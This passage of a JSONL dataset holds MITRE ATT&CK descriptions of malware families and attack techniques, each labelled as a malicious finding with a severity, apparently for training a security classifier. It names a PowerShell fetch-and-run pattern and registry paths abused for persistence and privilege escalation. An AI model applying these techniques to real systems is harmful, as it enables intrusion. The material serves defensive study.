{"id": "mitre_00312", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cuckoo Stealer\n\nType: malware\nPlatforms: macOS\n\n[Cuckoo Stealer](https://attack.mitre.org/software/S1153) is a macOS malware with characteristics of spyware and an infostealer that has been in use since at least 2024. [Cuckoo Stealer](https://attack.mitre.org/software/S1153) is a universal Mach-O binary that can run on Intel or ARM-based Macs and has been spread through trojanized versions of various potentially unwanted programs or PUP's such as converters, cleaners, and uninstallers.(Citation: Kandji Cuckoo April 2024)(Citation: SentinelOne Cuckoo Stealer May 2024)\n", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cuckoo Stealer", "malware_type": "malware"}}]}
{"id": "mitre_00313", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Volgmer\n\nType: malware\nPlatforms: Windows\n\n[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Volgmer", "malware_type": "malware"}}]}
{"id": "mitre_00314", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Services Registry Permissions Weakness\n\nTechnique: T1574.011\nTactics: persistence, privilege-escalation, defense-evasion\nPlatforms: Windows\n\nAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.\n\nFor example, the registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary cou", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1574.011", "technique_name": "Services Registry Permissions Weakness", "tactics": ["persistence", "privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00315", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Raspberry Robin\n\nType: malware\nPlatforms: Windows\n\n[Raspberry Robin](https://attack.mitre.org/software/S1130) is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. [Raspberry Robin](https://attack.mitre.org/software/S1130) has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as [SocGholish](https://attack.mitre.org/software/S1124), [Cobalt Strike](https://attack.mitre.org/software/S0154), [IcedID](https://attack.mitre.org/software/S0483), and [Bumblebee](https://attack.mitre.org/software/S1039).(Citation: TrendMicro RaspberryRobin 2022)(Citation: RedCanary RaspberryRobin 2022)(Citation: HP RaspberryRobin 2024) The DLL componenet in the [Raspberry Robin](https://attack.mitre.org/software/S1130) infection chain is also referred to as \"Roshtyak.\"(Citation: Avast RaspberryRobin 2022) The name \"Raspberry Robin\" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as Storm-0856 by some vendors.(Citation: Microsoft RaspberryRobin 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Raspberry Robin", "malware_type": "malware"}}]}
{"id": "mitre_00316", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BendyBear\n\nType: malware\nPlatforms: Windows\n\n[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BendyBear", "malware_type": "malware"}}]}
{"id": "mitre_00317", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BitPaymer\n\nType: malware\nPlatforms: Windows\n\n[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BitPaymer", "malware_type": "malware"}}]}
{"id": "mitre_00318", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Code Signing Certificates\n\nTechnique: T1587.002\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1587.002", "technique_name": "Code Signing Certificates", "tactics": ["resource-development"]}}]}
{"id": "mitre_00319", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pteranodon\n\nType: malware\nPlatforms: Windows\n\n[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Pteranodon", "malware_type": "malware"}}]}
{"id": "mitre_00320", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Image File Execution Options Injection\n\nTechnique: T1546.012\nTactics: privilege-escalation, persistence\nPlatforms: Windows\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.012", "technique_name": "Image File Execution Options Injection", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00321", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Ingress Tool Transfer\n\nTechnique: T1105\nTactics: command-and-control\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1105", "technique_name": "Ingress Tool Transfer", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00322", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Golden Ticket\n\nTechnique: T1558.001\nTactics: credential-access\nPlatforms: Windows\n\nAdversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1558.001", "technique_name": "Golden Ticket", "tactics": ["credential-access"]}}]}
{"id": "mitre_00323", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Clambling\n\nType: malware\nPlatforms: Windows\n\n[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Clambling", "malware_type": "malware"}}]}
{"id": "mitre_00324", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exaramel for Linux\n\nType: malware\nPlatforms: Linux\n\n[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Exaramel for Linux", "malware_type": "malware"}}]}
{"id": "mitre_00325", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Change Default File Association\n\nTechnique: T1042\nTactics: persistence\nPlatforms: Windows\n\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example:\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1042", "technique_name": "Change Default File Association", "tactics": ["persistence"]}}]}
{"id": "mitre_00326", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# FELIXROOT\n\nType: malware\nPlatforms: Windows\n\n[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "FELIXROOT", "malware_type": "malware"}}]}
{"id": "mitre_00327", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Double File Extension\n\nTechnique: T1036.007\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.007", "technique_name": "Double File Extension", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00328", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Custom Command and Control Protocol\n\nTechnique: T1094\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAdversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1094", "technique_name": "Custom Command and Control Protocol", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00329", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SIP and Trust Provider Hijacking\n\nTechnique: T1553.003\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1553.003", "technique_name": "SIP and Trust Provider Hijacking", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00330", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Agent Tesla\n\nType: malware\nPlatforms: Windows\n\n[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Agent Tesla", "malware_type": "malware"}}]}
{"id": "mitre_00331", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CLAIMLOADER\n\nType: malware\nPlatforms: Windows\n\n[CLAIMLOADER](https://attack.mitre.org/software/S1236) is a malware variant that frequently accompanies legitimate executables that are used for DLL side-loading known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2021.(Citation: IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025)(Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CLAIMLOADER", "malware_type": "malware"}}]}
{"id": "mitre_00332", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# JPIN\n\nType: malware\nPlatforms: Windows\n\n[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "JPIN", "malware_type": "malware"}}]}
{"id": "mitre_00333", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# WEBC2\n\nType: malware\nPlatforms: Windows\n\n[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "WEBC2", "malware_type": "malware"}}]}
{"id": "mitre_00334", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CostaBricks\n\nType: malware\nPlatforms: Windows\n\n[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CostaBricks", "malware_type": "malware"}}]}
{"id": "mitre_00335", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cloud Service Hijacking\n\nTechnique: T1496.004\nTactics: impact\nPlatforms: SaaS\n\nAdversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. \n\nFor example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)\n\nIn some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1496.004", "technique_name": "Cloud Service Hijacking", "tactics": ["impact"]}}]}
{"id": "mitre_00336", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LLMNR/NBT-NS Poisoning and Relay\n\nTechnique: T1171\nTactics: credential-access\nPlatforms: Windows\n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1171", "technique_name": "LLMNR/NBT-NS Poisoning and Relay", "tactics": ["credential-access"]}}]}
{"id": "mitre_00337", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Remote Service Session Hijacking\n\nTechnique: T1563\nTactics: lateral-movement\nPlatforms: Linux, macOS, Windows\n\nAdversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1563", "technique_name": "Remote Service Session Hijacking", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00338", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NICECURL\n\nType: malware\nPlatforms: Windows\n\n[NICECURL](https://attack.mitre.org/software/S1192) is a VBScript-based backdoor used by [APT42](https://attack.mitre.org/groups/G1044) to download additional modules.(Citation: Mandiant APT42-untangling)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NICECURL", "malware_type": "malware"}}]}
{"id": "mitre_00339", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Comnie\n\nType: malware\nPlatforms: Windows\n\n[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Comnie", "malware_type": "malware"}}]}
{"id": "mitre_00340", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Kernel Modules and Extensions\n\nTechnique: T1215\nTactics: persistence\nPlatforms: Linux, macOS\n\nLoadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and 